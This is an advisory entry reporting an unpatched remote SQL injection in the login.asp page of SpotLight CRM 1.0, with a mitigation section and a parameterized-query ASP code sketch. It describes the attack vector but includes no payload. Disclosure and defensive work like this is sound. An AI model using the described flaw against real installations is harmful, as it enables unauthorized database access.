vendor: SpotLight CRM
by: ajann
CVSS: 7.5 (HIGH)
Remote SQL Injection
CWE: 89
Product Name: SpotLight CRM
Affected Version From: SpotLight CRM 1.0
Affected Version To: SpotLight CRM 1.0
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2006
SpotLight CRM 1.0 (login.asp) | Remote SQL Injection Vulnerability
The SpotLight CRM 1.0 web application is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by submitting specially crafted input through the login.asp page, which the application incorporates into a SQL query. This allows the attacker to manipulate the database and potentially gain unauthorized access to sensitive information.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize user input and use parameterized queries or prepared statements to prevent SQL injection attacks. Additionally, keeping the software up to date with the latest security patches and regularly monitoring for any suspicious activity can help prevent such vulnerabilities.
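The parameterized-query mitigation above, sketched for the account lookup in a classic ASP login handler (an added example, not SpotLight CRM's code). The `users` table and its columns, the `username` form field and the `CrmConnectionString` application setting are assumptions; password verification is done by whatever code follows the lookup.

```vbscript
<%
Option Explicit

' ADO constants (values as defined in adovbs.inc)
Const adCmdText = 1
Const adParamInput = 1
Const adVarWChar = 202

Const MAX_USERNAME_LEN = 64   ' assumed width of the username column

' Returns Array(user_id, password_hash) for a matching account, or Empty.
' Table and column names are hypothetical.
Function FindUser(conn, userName)
    Dim cmd, rs
    FindUser = Empty
    ' Reject input that cannot be a valid account name before querying.
    If Len(userName) = 0 Or Len(userName) > MAX_USERNAME_LEN Then Exit Function

    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' The ? placeholder is bound as a typed value; it is never spliced into the SQL text.
    cmd.CommandText = "SELECT user_id, password_hash FROM users WHERE username = ?"
    cmd.Parameters.Append cmd.CreateParameter("username", adVarWChar, adParamInput, MAX_USERNAME_LEN, userName)

    Set rs = cmd.Execute
    If Not rs.EOF Then
        FindUser = Array(rs("user_id").Value, rs("password_hash").Value)
    End If
    rs.Close
    Set rs = Nothing
    Set cmd = Nothing
End Function

Dim conn, account
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("CrmConnectionString")   ' assumed application setting
account = FindUser(conn, Trim(Request.Form("username")))
conn.Close
Set conn = Nothing

If IsEmpty(account) Then
    ' Same response for unknown user and wrong password; no database error text is echoed.
    Response.Status = "401 Unauthorized"
    Response.Write "Invalid user name or password."
    Response.End
End If
' account(1) holds the stored hash for the password check that follows.
%>
```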